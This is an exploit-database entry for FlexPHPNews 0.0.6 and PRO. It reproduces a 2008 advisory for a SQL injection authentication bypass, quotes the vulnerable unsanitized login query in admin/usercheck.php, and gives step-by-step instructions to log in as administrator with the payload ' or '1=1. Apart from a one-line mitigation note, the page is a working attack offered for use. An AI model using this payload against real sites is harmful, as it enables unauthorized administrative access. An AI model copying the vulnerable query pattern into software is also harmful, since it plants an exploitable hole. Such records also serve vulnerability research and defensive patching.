header-logo
Suggest Exploit
vendor:
FlexPHPNews PRO 0.0.6 & FlexPHPNews 0.0.6
by:
Osirys
7.5
CVSS
HIGH
Sql Injection (Auth bypass)
89
CWE
Product Name: FlexPHPNews PRO 0.0.6 & FlexPHPNews 0.0.6
Affected Version From: 0.0.6
Affected Version To: 0.0.6 Pro
Patch Exists: NO
Related CWE: N/A
CPE: a:flexphpnews:flexphpnews_pro:0.0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FlexPHPNews PRO 0.0.6 & FlexPHPNews 0.0.6 – Sql Injection (Auth bypass)

Bugged file is: /[path]/admin/usercheck.php. Go to /[path]/admin/index.php and put as username and password the following sql code: ' or '1=1. You are the admin now, bypass succesfull =)

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

[START]

#########################################################################################
[0x01] Informations:

Script         : FlexPHPNews PRO 0.0.6
Script	       : FlexPHPNews 0.0.6
Download       : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1  [0.0.6 Pro]
Download       : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1  [0.0.6]
Vulnerability  : Sql Injection (Auth bypass)
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke

#########################################################################################
[0x02] Bug:[Sql Injection (Auth bypass)]
######

Bugged file is: /[path]/admin/usercheck.php

[CODE]

if (!empty($logincheck)){
$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'";
$results = $db->select($sql);

[/CODE]


[!] EXPLOIT DETAILS:

 [1] Go to /[path]/admin/index.php
 [2] Put as username and password the following sql code: ' or '1=1
 [3] You are the admin now, bypass succesfull =)

#########################################################################################

[/END]

# milw0rm.com [2008-12-14]